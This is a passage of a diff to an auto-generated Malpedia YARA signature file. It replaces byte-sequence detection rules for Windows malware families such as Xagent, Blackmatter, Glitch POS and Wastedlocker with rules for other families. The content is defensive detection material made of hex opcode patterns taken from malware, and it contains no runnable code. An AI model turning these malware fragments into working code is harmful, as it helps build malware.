= { 42 4b 4e 53 47 4b 56 } + $sequence_7 = { 44 56 53 49 4f 45 } + $sequence_8 = { 8bf8 90 e9???????? 8807 90 42 90 } + $sequence_9 = { bb53203dfd 3106 83c604 bb975ea4f7 ebb5 83f901 } condition: - 7 of them and filesize <181248 + 7 of them and filesize <4202496 } -rule MALPEDIA_Win_Furtim_Auto : FILE +rule MALPEDIA_Win_Rm3_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ff92451b-6d4d-5ce0-b407-7dcb5e6ae2c6" + id = "7719069f-32fe-5972-8438-aed4e36844e7" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.furtim" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.furtim_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rm3" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rm3_auto.yar#L1-L378" license_url = "N/A" - logic_hash = "01fa4c0038a5d8991914e1859c3786c2de4cd564716dd7c7ecdf607d66ee4df9" + logic_hash = "108e288ac75d378107658478aa6294381528e48e962e4f140c133bb5541af046" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -132053,34 +134654,64 @@ rule MALPEDIA_Win_Furtim_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 5f 5e c9 c20400 6a0c 68???????? e8???????? } - $sequence_1 = { 85c0 7c28 8d45fc 50 6a04 ff15???????? } - $sequence_2 = { c7867802000020d94000 c78600050000cb224000 c786f406000032164000 c746601c724400 c7869c06000032254000 c786fc020000ca254000 } - $sequence_3 = { 59 85c0 7408 8bce ff96cc050000 5f } - $sequence_4 = { 57 8bf1 8dbeb8000000 57 c7071c010000 ff96bc030000 } - $sequence_5 = { c9 c20800 8bff 55 8bec 83ec10 ff7508 } - $sequence_6 = { 0f85e3000000 39a9c0000000 7542 0fb781cc010000 663bc5 7405 663bc3 } - $sequence_7 = { 740f 837dfc01 7509 c686c405000001 eb0e 8bce ff96f8040000 } - $sequence_8 = { c745e4e4624400 c745e8ec624400 c745ecf4624400 c745f0fc624400 c745f404634400 c745f8???????? } - $sequence_9 = { 389f94010000 7546 80bf9501000015 7535 80bf960100005d 752c 8bce } + $sequence_0 = { 8d7c13ff 4a f7d2 23fa 3bf8 7609 } + $sequence_1 = { 8b4138 8b5608 8d5410ff 48 f7d0 } + $sequence_2 = { 8b45f8 83c628 ff4dfc 85c0 } + $sequence_3 = { 8931 8b7004 897104 8b4808 ff7004 } + $sequence_4 = { 034c240c 8b00 51 03c2 50 e8???????? } + $sequence_5 = { 3bf8 7609 8b413c 8d5418ff eb0a } + $sequence_6 = { 8b460c 03c2 394508 7303 8975f8 8b45f8 } + $sequence_7 = { 8b5e10 8d4438ff 4f f7d7 23c7 8d7c13ff 4a } + $sequence_8 = { 41 ff4508 ff4d0c 885405fc } + $sequence_9 = { 57 8bc3 8d9568ffffff e8???????? 8b849d64ffffff } + $sequence_10 = { e8???????? 8b5508 57 8bc3 8d8d58feffff e8???????? } + $sequence_11 = { 8b750c 50 8db4b558feffff 894510 } + $sequence_12 = { 8bf0 2b7508 f7de 1bf6 83e60b } + $sequence_13 = { e8???????? 8bd8 85db 7420 8d45fc } + $sequence_14 = { e8???????? 2bf3 89750c 0f88b3000000 8d3c1e 8dbcbd58feffff } + $sequence_15 = { 744b 8975fc 6a18 5e } + $sequence_16 = { 33d2 4533c0 410fc9 48f7b42488000000 8b15???????? } + $sequence_17 = { 488bf3 488bce e8???????? 4885c0 488bd8 7415 } + $sequence_18 = { 4155 4156 4157 4883ec30 4c8b05???????? 49b91ddd6c4f91f44525 } + $sequence_19 = { 41be18000000 488b15???????? 488b4270 488bc8 48c1e90c 4833c1 488bc8 } + $sequence_20 = { 57 4154 4155 4156 4157 4883ec20 4c8b05???????? } + $sequence_21 = { 488bc1 48c1e81b 4833c1 33c9 480fafc3 } + $sequence_22 = { ff15???????? 85c0 7445 488d4c2468 ff15???????? ff15???????? } + $sequence_23 = { 488d4c2440 4c8bce 4c8bc5 498bd4 } + $sequence_24 = { 899568ffffff 89b564ffffff 889d63ffffff 7570 31c0 89855cffffff eb16 } + $sequence_25 = { 8d0d84308702 31d2 8b75f0 89462c 890c24 } + $sequence_26 = { 885801 39d7 897db8 8975b4 75d7 8d45d4 } + $sequence_27 = { a1???????? 6a00 6a00 6a00 6a00 68???????? ffd0 } + $sequence_28 = { ffd0 8d0dd1318702 890424 894c2404 e8???????? 83f800 } + $sequence_29 = { 52 8bb5e0fbffff 56 8985d0fbffff 8995ccfbffff 898dc8fbffff ffd7 } + $sequence_30 = { 8945d0 8b45d0 8b4dd4 8b55ec 01ca 891424 } + $sequence_31 = { 897dec 8955e8 8975e4 ffd3 83ec10 890424 } + $sequence_32 = { 53 57 56 83ec20 8b450c 8b4d08 31d2 } + $sequence_33 = { 890c24 c744240400000000 8955dc e8???????? 8d0d77318702 890424 } + $sequence_34 = { 8b7834 8b5f3c 8945f0 89f8 01d8 813c1f50450000 } + $sequence_35 = { 8bbd64fdffff 897e08 8b9d68fdffff 891e } + $sequence_36 = { c7460cfe308702 c74604???????? 8b35???????? 8985e0fdffff 898ddcfdffff 8995d8fdffff } + $sequence_37 = { 898dfcfeffff e8???????? 890424 8b853cffffff 89442404 } + $sequence_38 = { 89e2 894a04 c70204010000 8b15???????? 8985e8fdffff 898de4fdffff } + $sequence_39 = { 8b5924 89855cffffff 89d8 c1e81e 83e001 } condition: - 7 of them and filesize <622592 + 7 of them and filesize <221184 } -rule MALPEDIA_Win_Xagent_Auto : FILE +rule MALPEDIA_Win_Royalcli_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "bde2508f-cfa2-522c-bf18-0bedb23d3501" + id = "8a3d9888-c19a-51e8-8633-e1429e45af66" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xagent" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.xagent_auto.yar#L1-L231" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.royalcli" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.royalcli_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "1ef231aa11dc012f9839829c886b5e479b3c99a501478ca77ee155ba663fd5ac" + logic_hash = "5cdfe5e738245420de8a121061e185e2740c336e09d01f0babed3f279bcde56b" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -132092,48 +134723,32 @@ rule MALPEDIA_Win_Xagent_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c1ea02 6bd20d b801000000 2bc2 } - $sequence_1 = { ff15???????? 8bd8 e8???????? 03d8 } - $sequence_2 = { 5b 8be5 5d c20400 8d4de4 e8???????? b8???????? } - $sequence_3 = { 8b4604 85c0 7407 8b4d08 8b11 } - $sequence_4 = { 2bc7 8b5204 8b0482 8b0488 8b4e10 } - $sequence_5 = { 85c9 7423 8b7e08 ff460c 03ff } - $sequence_6 = { 33d2 eb02 8b11 8b4808 8bc1 57 } - $sequence_7 = { 3b7e0c 7707 c7460c00000000 49 } - $sequence_8 = { 894e10 7507 c7460c00000000 5f } - $sequence_9 = { 55 8bec 33c0 83ec0c 39412c } - $sequence_10 = { 384b02 0f92c3 488d4c2430 e8???????? 90 } - $sequence_11 = { e8???????? 90 0fb705???????? 6689442420 } - $sequence_12 = { e8???????? 488b4328 4c8bcf 4c8bc6 } - $sequence_13 = { 84c0 740c 488b07 488b0b } - $sequence_14 = { 8bd8 e8???????? 8d0c18 e8???????? } - $sequence_15 = { 48896c2410 4889742418 57 4883ec30 4883792800 } - $sequence_16 = { e8???????? 498bce 4e8d0437 482bcf } - $sequence_17 = { 740c 488b07 4c8b13 488903 } - $sequence_18 = { b803b57ea5 f7e6 c1ea06 6bd263 } - $sequence_19 = { ff15???????? baf4010000 488bcb ff15???????? 85c0 } - $sequence_20 = { c1ea07 69d295000000 2bca 8bd1 } - $sequence_21 = { 75f8 482bc3 4d8bc6 498bd7 } - $sequence_22 = { 75f8 482bc3 4c8bc6 488bd7 } - $sequence_23 = { 75f8 482bc3 498bd7 488d0c18 } - $sequence_24 = { 75f8 482bc5 4533e4 488bbc2480000000 } - $sequence_25 = { 75f8 482bc3 498bd6 488d0c18 e8???????? 488bd7 4885ff } + $sequence_0 = { 41 3bcf 7cb5 56 } + $sequence_1 = { e8???????? 33f6 83c42c 3bc6 0f8c19050000 83bda4feffff1c 0f8c0c050000 } + $sequence_2 = { 5d c3 56 ff15???????? 5b 5f 33c0 } + $sequence_3 = { 898dccf9ffff 7d10 33c0 8b4dfc } + $sequence_4 = { 8b08 8d954cf7ffff 52 68???????? } + $sequence_5 = { 33f6 ff15???????? e9???????? 8b4708 } + $sequence_6 = { 6a01 50 e8???????? 56 8945dc e8???????? 8b55e0 } + $sequence_7 = { 83c414 8955e4 2bd0 8d9b00000000 } + $sequence_8 = { 8bbdd4f9ffff 8b9dc4f9ffff 807c3b0f00 751c 8b4b08 8b5508 } + $sequence_9 = { 50 e8???????? 6820010000 8d8dc0fdffff 56 51 e8???????? } condition: - 7 of them and filesize <729088 + 7 of them and filesize <204800 } -rule MALPEDIA_Win_Unidentified_045_Auto : FILE +rule MALPEDIA_Win_Unidentified_013_Korean_Malware_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a8bfd3f0-95b3-5af9-8c6f-fa63b3ef83b3" + id = "6cb9e399-7a4a-5f81-aaa6-7cb702a29e01" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_045" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_045_auto.yar#L1-L104" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_013_korean_malware" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_013_korean_malware_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "16726755d5995c8139758648ed741d294bd49338a51b6fd2af1cb4cf9c59e23f" + logic_hash = "c008af161ea64c4cea7a6eccb5b08fe1a4b68cae21f50d0dd25e80b0eb93ad58" score = 75 quality = 75 tags = "FILE" @@ -132147,30 +134762,32 @@ rule MALPEDIA_Win_Unidentified_045_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 e8???????? 83c40c 68???????? 68???????? 68???????? e8???????? } - $sequence_1 = { 8930 8935???????? eb2b 837d0c02 7528 8b35???????? } - $sequence_2 = { 8bc7 eb5c 33f6 85f6 7609 } - $sequence_3 = { 6804010000 8d44244c 57 50 e8???????? 8b35???????? } - $sequence_4 = { ff15???????? 33f6 56 56 6a02 56 56 } - $sequence_5 = { 6a01 56 56 ff7508 897dac 56 } - $sequence_6 = { 3345fc 5e c9 c3 803d????????00 } - $sequence_7 = { 6a0c 50 57 8975f4 } + $sequence_0 = { 3bd7 7cf5 7f04 3bc5 72ef } + $sequence_1 = { 57 a1???????? 33c4 50 8d842458060000 64a300000000 68???????? } + $sequence_2 = { 6800040000 8d4c241c 51 57 ffd5 85c0 743f } + $sequence_3 = { 81c40c040000 c3 8b2d???????? 8d44240c 50 } + $sequence_4 = { e8???????? 83c424 8bd8 8d542414 8d8c2454030000 } + $sequence_5 = { 8b44243c ff4c241c 3bf8 7605 e8???????? 8b44242c bb10000000 } + $sequence_6 = { 83c428 c3 3c03 0f8558ffffff 83f901 } + $sequence_7 = { 8d442414 50 c744242003000000 ff15???????? b902000000 } + $sequence_8 = { 68???????? 68???????? e8???????? 83c410 e8???????? b230 } + $sequence_9 = { 6a00 6a00 6a00 8bf2 6a00 6a00 8bf9 } condition: - 7 of them and filesize <73728 + 7 of them and filesize <204800 } -rule MALPEDIA_Win_Kegotip_Auto : FILE +rule MALPEDIA_Win_Alice_Atm_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "00ad7f0a-dc8e-510c-a1d3-35279f77a6e7" + id = "66f601ee-4bc7-50a3-954d-4444abf4a52f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kegotip" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kegotip_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alice_atm" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.alice_atm_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "32b69314873829a2218a5374ade1e7ef8ad560cb68aa690aa8ede1fd50d9aa93" + logic_hash = "5f587bc558ca0a42c8c96fe5a1cfb47b3decdd71da86c983392de940e1606224" score = 75 quality = 75 tags = "FILE" @@ -132184,32 +134801,32 @@ rule MALPEDIA_Win_Kegotip_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { eb6d e9???????? eb63 c745f400000000 } - $sequence_1 = { e8???????? 83c40c c705????????94000000 68???????? } - $sequence_2 = { 83c201 8955ec 8b45f8 83c004 8945f8 } - $sequence_3 = { 89420c 8b4dfc c7412400000000 8b55fc a1???????? 894210 6a10 } - $sequence_4 = { 8b55f8 83c201 8955f8 ebe0 8b45f8 0fbe08 } - $sequence_5 = { 6800100000 6800000800 6a00 ff15???????? 8945fc 837dfc00 7504 } - $sequence_6 = { 0f8592000000 8b4508 0345e8 0fb648ff 51 } - $sequence_7 = { 52 8b4508 50 8d4df4 51 6a00 68???????? } - $sequence_8 = { 8b85fcfdffff 0fbe8c0500feffff 83f97a 7f1e 8b95fcfdffff 0fbe841500feffff 83e820 } - $sequence_9 = { 8d85b0feffff 50 6a00 8d8dd8feffff 51 ff15???????? } + $sequence_0 = { ff75f8 8f45fc ff7508 e8???????? 8b45fc } + $sequence_1 = { 0fb7c0 8945f8 8b7d10 83ff00 0f86c2000000 } + $sequence_2 = { c9 c20c00 55 8bec 81c4a4feffff } + $sequence_3 = { 894609 837f0414 7305 8b5704 } + $sequence_4 = { 897dfc 8d9df6fdffff 53 ff7508 e8???????? 0bc0 } + $sequence_5 = { 57 e8???????? 0bc0 0f848b000000 53 6804010000 } + $sequence_6 = { 53 e8???????? 57 6806020000 56 } + $sequence_7 = { 50 68???????? 68???????? 8d45e8 50 68???????? 6a05 } + $sequence_8 = { 6a00 6a00 6809100000 ff7320 e8???????? 8945fc } + $sequence_9 = { 0f85ce000000 68ea030000 ff7508 e8???????? 8bf8 } condition: - 7 of them and filesize <278528 + 7 of them and filesize <49152 } -rule MALPEDIA_Win_Unidentified_088_Auto : FILE +rule MALPEDIA_Win_Blackmatter_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "008a08cf-eb70-5951-921d-71ebeefbb775" + id = "08d983f8-89d3-5398-96f5-8f771b0988c8" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_088" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_088_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackmatter" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.blackmatter_auto.yar#L1-L119" license_url = "N/A" - logic_hash = "edb29cf74a1f7930c182d8621bb40052ec38cc60668c8de3f80bbb2fb8759321" + logic_hash = "67609ff5035d7d172ddf1a903ab845a6e5b4b36e758aab3cb262223fbb37577d" score = 75 quality = 75 tags = "FILE" @@ -132223,32 +134840,32 @@ rule MALPEDIA_Win_Unidentified_088_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c642e801 894af4 83f807 75df c705????????06000000 c705????????11000000 c705????????12000000 } - $sequence_1 = { c705????????208d4200 c705????????62eb4100 c705????????90154200 c605????????01 c705????????10000000 c705????????20a94200 c705????????40eb4100 } - $sequence_2 = { c605????????01 c705????????04000000 c705????????80a94200 c705????????61e04100 c705????????30054200 c705????????00000000 } - $sequence_3 = { 8b10 8d4a01 8d3490 8908 8b4de4 8b5e08 } - $sequence_4 = { 0f8438010000 8b00 39c7 720d 48 893c24 } - $sequence_5 = { 8b7de4 e9???????? 8d65f4 5b 5e 5f 5d } - $sequence_6 = { e9???????? c705????????08000000 c705????????04000000 c605????????12 c705????????00000000 c705????????d80f4200 } - $sequence_7 = { c705????????a0ad4200 c705????????4ce84100 c705????????100d4200 c605????????01 c705????????04000000 } - $sequence_8 = { e8???????? 89d9 89c2 e8???????? 8d65f4 5b } - $sequence_9 = { 894c2408 89f1 89542404 895c240c e8???????? b904000000 83ec10 } + $sequence_0 = { 57 c745fc00000000 ff35???????? e8???????? 8bf8 } + $sequence_1 = { ff75f8 ff15???????? 85c0 0f85e7000000 68???????? } + $sequence_2 = { 83c4d8 53 56 57 c745fc00000000 c745f800000000 } + $sequence_3 = { e8???????? 8945fc eb0c 83c702 ff4df8 837df800 } + $sequence_4 = { e9???????? ff75c8 e8???????? 8945c4 } + $sequence_5 = { ff15???????? 83c40c 8d047500000000 50 8d45da } + $sequence_6 = { 85f6 0f842c010000 56 ff35???????? e8???????? ff35???????? e8???????? } + $sequence_7 = { f7f1 92 3b4508 720b 3b450c } + $sequence_8 = { 8945ec e8???????? e8???????? 803d????????00 7405 } + $sequence_9 = { ff75f4 e8???????? 5e 5b 8be5 5d c3 } condition: - 7 of them and filesize <919552 + 7 of them and filesize <194560 } -rule MALPEDIA_Win_Darkmegi_Auto : FILE +rule MALPEDIA_Win_Glitch_Pos_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b4298044-373c-5ebc-af72-71a8178891f9" + id = "f95f1f9c-9245-5181-9c68-89e1dc86d5ed" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmegi" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.darkmegi_auto.yar#L1-L114" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.glitch_pos" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.glitch_pos_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "594b35440f1c502a0c2d0a5e3fa86f0d3dc6b2f476ed2e839ff20aa39301e384" + logic_hash = "27fcd67a00a15c3597cc82166656216e7d9a07529c9493cfeef64f5dddb0c04c" score = 75 quality = 75 tags = "FILE" @@ -132262,34 +134879,34 @@ rule MALPEDIA_Win_Darkmegi_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 81c43c010000 c3 8b442448 6a00 6a00 50 } - $sequence_1 = { c3 8b44244c 56 3d50450000 7411 } - $sequence_2 = { 3db7000000 7517 56 ff15???????? 56 } - $sequence_3 = { ff15???????? 83c40c 8d4c2464 8d942478050000 8d442444 } - $sequence_4 = { 8b548c2c 668b02 50 ffd5 } - $sequence_5 = { 0fb6d2 f6820196b40204 7403 40 } - $sequence_6 = { 49 6a01 8dbc0ca9030000 ffd6 6a01 } - $sequence_7 = { 81e1ffff0000 3bc1 0f8c9bfeffff 33db 8b94249e030000 } - $sequence_8 = { 52 e8???????? 83c404 8bd8 85f6 7426 } - $sequence_9 = { 33c0 5e 83c468 c21000 e8???????? } + $sequence_0 = { 83a5d8feffff00 8b45b8 898518ffffff 8d45d0 50 8b8518ffffff } + $sequence_1 = { 8b4508 8b00 ff7508 ff9028070000 668b45d4 662d0100 } + $sequence_2 = { ffb504ffffff e8???????? 89855cfeffff eb07 83a55cfeffff00 8d8d5cffffff e8???????? } + $sequence_3 = { e8???????? 8d8520ffffff 50 8d8530ffffff 50 8d45dc 50 } + $sequence_4 = { 68???????? 68???????? e8???????? c78568feffff2cc34600 eb0a c78568feffff2cc34600 8b8568feffff } + $sequence_5 = { eb07 83a5fcfdffff00 8d45c4 50 8d45cc 50 6a02 } + $sequence_6 = { 8b4d10 660301 0f8058040000 668945ec 8b4508 8b00 } + $sequence_7 = { 83c40c 68???????? 6a00 6a06 8b4508 } + $sequence_8 = { 8d45b4 50 8d45b8 50 6a03 e8???????? } + $sequence_9 = { 8bec 83ec0c 68???????? 64a100000000 50 64892500000000 b8bc000000 } condition: - 7 of them and filesize <90304 + 7 of them and filesize <1024000 } -rule MALPEDIA_Win_Hzrat_Auto : FILE +rule MALPEDIA_Win_Tidepool_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4d1bc827-a443-5a54-876f-91ca96256a66" + id = "736615ac-754a-59af-859e-d31c5da8062a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hzrat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hzrat_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tidepool" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tidepool_auto.yar#L1-L265" license_url = "N/A" - logic_hash = "4c8da289e225a98c903b1e25bb40a32ef5f7bbd72fec724a7ddbf67c4f6841b8" + logic_hash = "6d671b94ab0cdccf8b9683ef25d1220e65648f34328ff5e4475983ab8ad7951c" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -132301,32 +134918,51 @@ rule MALPEDIA_Win_Hzrat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7526 c745f500000000 8d4df4 8075f642 8075f742 8075f842 6a00 } - $sequence_1 = { ff15???????? 6689442412 8b44240c 89442414 8d442410 6a10 50 } - $sequence_2 = { 8bce ff7508 8b4020 ffd0 8b17 8bcf 8ad8 } - $sequence_3 = { 03da 81fa00010000 7312 8a8758e94200 0803 42 0fb64101 } - $sequence_4 = { 51 e8???????? 83c408 80bd93feffff00 c6856cfeffff00 7445 } - $sequence_5 = { 0faee8 e8???????? 8bc8 83c404 85c9 747d } - $sequence_6 = { 7410 fe8860f14200 8a8060f14200 84c0 7f1f 8bce e8???????? } - $sequence_7 = { dd4520 83c40c c9 c3 8b04c5c4324200 } - $sequence_8 = { 7312 0faee8 8b5104 8b4208 } - $sequence_9 = { c60000 c645fc03 8b9544fbffff 83fa10 } + $sequence_0 = { 6a00 50 8b08 ff91a4000000 } + $sequence_1 = { 8b4df4 64890d00000000 59 5f 5e 5b 8b8d00030000 } + $sequence_2 = { 8b8d00030000 33cd e8???????? 81c504030000 } + $sequence_3 = { 83c404 8bc6 5e c20400 80790800 } + $sequence_4 = { 53 6a02 8bf1 e8???????? } + $sequence_5 = { 6800000040 8d4500 50 ff15???????? } + $sequence_6 = { 2bc8 83e906 51 83c006 50 } + $sequence_7 = { e8???????? 83c40c 803d????????37 7518 68???????? } + $sequence_8 = { 8b4654 8d9698000000 52 8d5678 8b08 } + $sequence_9 = { 52 50 8b08 ff91f8000000 85c0 } + $sequence_10 = { 8b4654 50 8b08 ff5138 } + $sequence_11 = { 8d5658 52 50 ff91d0000000 33ff } + $sequence_12 = { c3 56 8bf1 e8???????? 8b4654 } + $sequence_13 = { 8d45ec 50 681f000200 53 } + $sequence_14 = { 6810270000 ff15???????? 8b45ec 8b08 } + $sequence_15 = { 681f000200 56 68???????? 6801000080 } + $sequence_16 = { 75f9 b8???????? b900000400 c60000 40 49 } + $sequence_17 = { e8???????? 68???????? 68???????? 68???????? 8d4500 } + $sequence_18 = { 57 50 6802020000 ff15???????? 68???????? ff15???????? } + $sequence_19 = { 8bc6 5e 5b c20400 6a14 68???????? } + $sequence_20 = { 6805400080 e8???????? 8b542424 52 53 } + $sequence_21 = { 33c9 8aea 83c003 83c504 } + $sequence_22 = { ff75ec ff15???????? 8b35???????? 6a04 } + $sequence_23 = { 83651400 8b07 83c40c 837d0c00 0f8ed1000000 8b4d08 41 } + $sequence_24 = { 8bec 8b4508 56 833c850811011000 } + $sequence_25 = { 50 ff7508 ff15???????? 395dfc 53 } + $sequence_26 = { 50 8d4604 50 e8???????? 8d45e0 6a04 } + $sequence_27 = { 50 89450c ff15???????? 53 ff75fc ff75f8 } + $sequence_28 = { 8365ec00 8945f4 8d3dd8e30010 8b45f4 d1e0 03f8 } condition: - 7 of them and filesize <409600 + 7 of them and filesize <1998848 } -rule MALPEDIA_Win_Quantloader_Auto : FILE +rule MALPEDIA_Win_Iisniff_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4febf63d-0f98-5ee5-9cc6-9fa1c2da1c7c" + id = "4d48d0b9-4608-5fda-9d9c-52fef07b4d04" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.quantloader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.quantloader_auto.yar#L1-L175" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.iisniff" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.iisniff_auto.yar#L1-L161" license_url = "N/A" - logic_hash = "02e93017f3318c384f200ca1e9ba6b581c4815c155dd61d906306a2c75ce48f2" + logic_hash = "eea8ed3537fc508bcc20c7dcdf7a5fa6fb525fac16191889baa1f35692f7bc88" score = 75 quality = 75 tags = "FILE" @@ -132340,38 +134976,37 @@ rule MALPEDIA_Win_Quantloader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d85f8fdffff 890424 e8???????? 8d85f8fdffff 890424 e8???????? } - $sequence_1 = { e8???????? c7442404???????? c70424???????? e8???????? 8b450c } - $sequence_2 = { e8???????? 85c0 750c c70424???????? e8???????? c70424???????? } - $sequence_3 = { e8???????? 85c0 0f94c0 0fb6d8 c744240801000000 8b45f8 } - $sequence_4 = { 89442404 c7042400000000 e8???????? 83ec0c 8d85f8f7ffff 89442404 } - $sequence_5 = { c744240400000000 c70424???????? e8???????? 83ec14 8945f4 } - $sequence_6 = { c70424???????? e8???????? c744240800000000 c7442404???????? c70424???????? } - $sequence_7 = { 817d08???????? 7470 817d0c00704000 7467 8b4508 803800 } - $sequence_8 = { 8d341e 66ad 6633d0 75df } - $sequence_9 = { 75f1 5e 8bc6 8bf7 3bc5 7403 } - $sequence_10 = { 61 c3 60 8bd3 8bf2 03763c 2b5634 } - $sequence_11 = { 837d5400 7425 64ff3530000000 59 8b490c 8b490c } - $sequence_12 = { ff30 6800100000 57 81042400100000 ff550c } - $sequence_13 = { 61 c3 58 ffd0 837c240802 7414 64a118000000 } - $sequence_14 = { 5d 8bc4 ff7010 ff700c ff7008 ff5550 e8???????? } - $sequence_15 = { 85c0 741b a900000080 7504 8d440302 25ffffff7f } + $sequence_0 = { 85c0 7513 8b442414 8b4804 53 } + $sequence_1 = { 8b8c240c000100 56 8d842414000100 50 51 } + $sequence_2 = { 7507 be04000000 eb69 c645fc01 8b0f } + $sequence_3 = { 55 56 8bb42488000000 57 33db } + $sequence_4 = { 83d8ff 85c0 7537 8dbc24a4000000 e8???????? } + $sequence_5 = { 5f 5b c20400 8b4038 8b08 890e } + $sequence_6 = { 8b45cc ff704c e8???????? 59 83f8ff 0f852cffffff } + $sequence_7 = { 56 8d4dd4 894598 e8???????? 8365fc00 56 8d4d9c } + $sequence_8 = { 895c241c 89442420 e8???????? 8bf0 } + $sequence_9 = { e8???????? 83c404 8d8c24fc000000 899c2448010000 89bc2444010000 } + $sequence_10 = { 6a03 68000000c0 68???????? ff15???????? 6a02 } + $sequence_11 = { e8???????? 8b4f3c 8b11 8d75c8 56 ff75cc } + $sequence_12 = { ff75e8 e8???????? 834dfcff 8b45dc } + $sequence_13 = { c3 ff7508 e8???????? 59 c3 833d????????00 7505 } + $sequence_14 = { 64a300000000 80bc24a400000000 7409 6a00 6a00 e8???????? 8b410c } condition: - 7 of them and filesize <155648 + 7 of them and filesize <1441792 } -rule MALPEDIA_Win_Wastedlocker_Auto : FILE +rule MALPEDIA_Win_Seduploader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b7e51866-b49c-5bda-b9e7-206c33d8d8a8" + id = "7f16d7a9-71b0-5c84-ab55-9cb76a2d5976" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wastedlocker" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.wastedlocker_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.seduploader" + source_url = 